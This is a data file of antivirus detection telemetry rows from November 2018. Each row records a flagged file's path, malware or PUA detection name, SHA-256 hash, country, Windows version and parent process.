  Row(detection=Row(filename='avscan-20181105-001236-6eaf7679', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56558570\\AVSCAN-20181105-000934-5B9BEDE8\\AVSCAN-20181105-001236-6EAF7679', filesize=256000, name='TR/Agent.9c4d03.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:42:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-201308-6c09cd14', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbd99eb2\\AVSCAN-20181104-200545-360213F6\\AVSCAN-20181104-201308-6C09CD14', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='631f664852d72a68a5192868894555b2d775c2886a2546411e331912b9bbc405', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T13:13:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-15-44-47.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T14:16:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='scmini.exe', filepath='\\\\?\\C:\\Program Files (x86)\\SmartCloudInput\\1.3.6.10910\\SCMiNi.exe', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='4f5d72478c0ea865608bea5bc11b1c4fcacf7272a9921e2aa26027d362cd030c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:35:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered lecor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='20f94b9918d2d4b8ba837df710b9f8b32efc249a3f913cf61e67c410e41599f4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:25:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-230308-47fd9c48', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbd99eb2\\AVSCAN-20181104-202554-C98B3607\\AVSCAN-20181104-230308-47FD9C48', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='631f664852d72a68a5192868894555b2d775c2886a2546411e331912b9bbc405', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T16:03:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132526-5793419a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132526-5793419A', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:25:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='createlnk.dll', filepath='C:\\Program Files (x86)\\Hewlett-Packard\\OrderReminder\\CreateLnk.dll', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='65ff6bf74e41d58d9d2fb4e8707bdbcaf30faef555369bb3f6b27fa7ef064ceb', metadata=Row(cmdline=None, country='AO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=673040, timestamp='2018-11-04T17:52:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-04T20:20:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='47fe71518d53f8a3f21dc303fada696a36ea42af', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\47fe71518d53f8a3f21dc303fada696a36ea42af', filesize=320000, name='Adware/DealPly.84c405.#M1.#R1'), hash='84c405fd17388c3cafb1c71a7ebdd9a79a95193a00d36016446d5bf597212570', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:46:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='powershell.exe', filepath='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='9a4079b38c42774a86baa3a839e2a0458d874a6dfd75183e1b58125dddc0c650', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T22:10:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-13-14-05.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-11-03T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T10:06:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lmtools.exe', filepath='F:\\研究生简历\\商家爱玩\\新建文件夹\\尚素英\\新建文件夹\\软件\\CAD2008能用\\AutoCAD 2008安装包\\support\\nlm\\Program Files\\Autodesk Network License Manager\\lmtools.exe', filesize=1536000, name='W32/Ramnit.CD.#M1.#R1'), hash='395114ee221cd21e7a379d6b8270e1bda6eef2df8da115b89328276118d3b545', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-04T15:34:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\\\\\/s \\\\\\"NIS\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Norton Internet Security\\\\\\\\Engine\\\\\\\\18.7.0.13\\\\\\\\diMaster.dll\\\\\\" \\\\\\/prefetch:1', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Norton Internet Security\\Engine\\18.7.0.13\\ccsvchst.exe', parentsize=130008, timestamp='2018-11-04T09:14:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\TEMP\\tmp7490146\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\nssBDEC.tmp\\KMPAddedCode_OpperCD.exe', parentsize=1766007, timestamp='2018-11-04T01:54:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-160647-e708669b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77a591b5\\AVSCAN-20181104-155558-81439129\\AVSCAN-20181104-160647-E708669B', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:06:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132345-f9344e95', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_99cac2e0\\AVSCAN-20181104-132328-F6E56D66\\AVSCAN-20181104-132345-F9344E95', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='9495cb03db3984712ece3e07887ad7fa02691bddd7312fd8b26552df820ea2d5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T12:23:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='chicken invaders 4.exe', filepath='E:\\NooN Games\\AutoPlay\\Temp\\Chicken Invaders 4\\Chicken Invaders 4.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='54ead74adf7ed441519196511e4d9d56a7cdeab303ecefe02193ed3c12917845', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:xHncDj\\\\\\/woky0BtZQ.1', country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T02:23:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cttunesvr.exe', filepath='\\\\?\\C:\\Windows\\System32\\cttunesvr.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='b82efd5978c82009f61f2bb127bf0bce653dd1428567cde08f56ddf7356c59ff', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:38:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='optsatadc.dll', filepath='C:\\Windows\\SysWOW64\\optsatadc.dll', filesize=576000, name='TR/Dldr.Stantinko.vjznk.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline='-k BitStreamingDrv', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\svchost.exe', parentsize=20992, timestamp='2018-11-04T13:58:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215355-180c0521', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_98e9e7a1\\AVSCAN-20181104-214414-CB96320B\\AVSCAN-20181104-215355-180C0521', filesize=244000, name='TR/BProtector.nes.4.#M1.#R1'), hash='bb1e635aa88a6906473713bd49368553f49c21e885c1586742542b3fee4b405c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:52:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-092642-8fbdc290', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23d9098e\\AVSCAN-20181104-091720-4E8FDD76\\AVSCAN-20181104-092642-8FBDC290', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:26:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='7wonders2.exe', filepath='D:\\العاب حديثة\\7 Wonders II\\7Wonders2.exe', filesize=2048000, name='W32/Virut.Gen.#M1.#R1'), hash='1ebb8e421c3ed5bbedf4d6ef83e41ef26a05a43e50fb42b925cee9b1791429aa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:09:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='testami.exe', filepath='h:\\oncb-test-linkage\\testami\\bin\\debug\\TESTAMI.exe', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='2e948afd834e3f421959b3731c0683c0feefd44fda9c6a43b8f4acbcb4fb6af5', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:04:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='chekraid.exe', filepath='C:\\SYSTEM.SAV\\util\\ChekRaid.exe', filesize=192000, name='HEUR/AGEN.1014163.#M1.#R1'), hash='4ad4aa15337e64c3737556187a28f047fe900c106b402e26f4dd0a4edc51c1e4', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Norton Security\\Engine\\22.16.0.247\\NortonSecurity.exe', parentsize=328648, timestamp='2018-11-04T11:45:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered fasil', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fasil', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='7a7861079f8bfbb11f413c6082bea20597e46c1b72e952e225c0cab6f75fbb4c', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:12:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='e:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T09:36:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='3db5aa07261f6da7fd1573deab6b4d6c1fa83df963f36ce98b55183f8dd98860', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T07:46:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service_kms.vir', filepath='C:\\Program Files\\KMSpico\\Service_KMS.VIR', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline='--engine=2 --session-id=WzsJimFyRuiBDuuZeegJN5nPkZnpUX81m2YPgA+t --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment', country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=12095608, timestamp='2018-11-04T21:13:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='silhouette studiosrv.exe', filepath='E:\\PORTABLE Software\\Silhouette America\\Silhouette Studio\\Silhouette StudioSrv.exe', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:21:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lostfile_exe_43149280.exe', filepath='\\\\?\\C:\\Users\\X\\Dropbox\\Formateo de PC\\Escuelas\\Escuela Nueva TP\\Imagen bak up\\E\\Lost Files\\LostFile_EXE_43149280.exe', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='2eaa02316df21c697b12694bdc8122398fa9ee3aa60df8f4b52750dee3aed968', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:56:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T19:07:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T14:54:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='new folder .exe', filepath='G:\\New Folder .exe', filesize=64000, name='TR/ATRAPS.Gen.#M300.#R5045'), hash='68f4238b31a205b4c2a5f4df6bba4cde5a4f77fa3c627ac03d5dda82d202457a', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4532816, timestamp='2018-11-04T05:51:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3ce845b71def4059502be3b85b3db4e1ec327bd04cffb0c62fe92ad57482fbca', metadata=Row(cmdline='\\\\\\/Embedding', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T04:30:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='54dc8a3477077ec6097dbe3ded593d72a6e1e6ef', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\54dc8a3477077ec6097dbe3ded593d72a6e1e6ef', filesize=320000, name='ADWARE/DealPly.Gen.#M1.#R1'), hash='a6f20675b630aff6262fb861b54bf4b895dd359f54182005bca0c1373d26804c', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:22:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-201250-9ba00306', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cad85403\\AVSCAN-20181104-193303-4F088A0E\\AVSCAN-20181104-201250-9BA00306', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='6d381533e89cbe6e42550aaf5fc035cd536fc6f116cb57a6fe7ea7b5499aba9d', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:12:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T17:33:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-153529-357a6233', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d2159bcd\\AVSCAN-20181104-153426-2CF6C84B\\AVSCAN-20181104-153529-357A6233', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:35:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181102-230649-399c59fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_51ec643d\\AVSCAN-20181102-230559-35822134\\AVSCAN-20181102-230649-399C59FD', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:06:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='icaredatarecovery.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\iCareDataRecovery.exe", filesize=64000, name='TR/Siggen.64000.9.#M1.#R1'), hash='c1861cb3e5d8193ebcc61ccee37d797fd13700ea8ad6080c5d62696233d914b6', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:17:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:35:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gsdx32-sse4.dll', filepath='H:\\模擬器\\pcsx2-v1.5.0-dev-2014-gb2a2a3a-windows-x86\\plugins\\GSdx32-SSE4.dll', filesize=2432000, name='W32/Ramnit.CD.#M1.#R1'), hash='71b4c7e7e80e54d814e542d3075a9d0b62831b950076c5b2189f63f0e4585f9a', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=815304, timestamp='2018-11-02T16:59:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcoded_000', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\Transcoded_000', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='fba306f3c42277b7aff5c59754a9afdf017ff592fbabcf0e378d642758b0519c', metadata=Row(cmdline=None, country='ZW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T19:15:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qtwad.exe.vir', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\C\\Users\\cpe\\AppData\\Local\\qtwad.exe.vir', filesize=3072000, name='HEUR/AGEN.1001693.#M1.#R1'), hash='8322ebefcb18b2ce8acd383f84dfb70db5b5104864443a1146ba4958ff5ecb05', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:13:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060303-50f7ede0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-060303-50F7EDE0', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='90c5f259076e65dbf393768136994f850806d08b149624dfc931e5c31416837c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:05:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-103606-21732a36', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_394a7848\\AVSCAN-20181102-103341-0819BF10\\AVSCAN-20181102-103606-21732A36', filesize=128000, name='TR/Crypt.XPACK.Gen2.#M300.#R100756'), hash='e5e2a99c4acd6dd07fc691c89de3fef957db9d64fdb04263ea8ceed03660addd', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:36:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-175839-3a56813c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5ba4b527\\AVSCAN-20181102-175817-374E9345\\AVSCAN-20181102-175839-3A56813C', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:58:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='185552321.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\185552321.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\/DB', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\IObit\\Driver Booster\\6.0.2\\MlwScan.exe', parentsize=690960, timestamp='2018-11-02T17:55:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bf541e9a740172369ca06f718158c966fb7703ac92d6e2e94fcc94db3ff267e9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-30\\BF541E9A740172369CA06F718158C966FB7703AC92D6E2E94FCC94DB3FF267E9', filesize=1728000, name='TR/Crypt.XPACK.Gen7.#M300.#R601544'), hash='bf541e9a740172369ca06f718158c966fb7703ac92d6e2e94fcc94db3ff267e9', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-30.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-27.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-28.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-29.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:04:58Z'), dt=datetime.date(2018, 11, 2)),
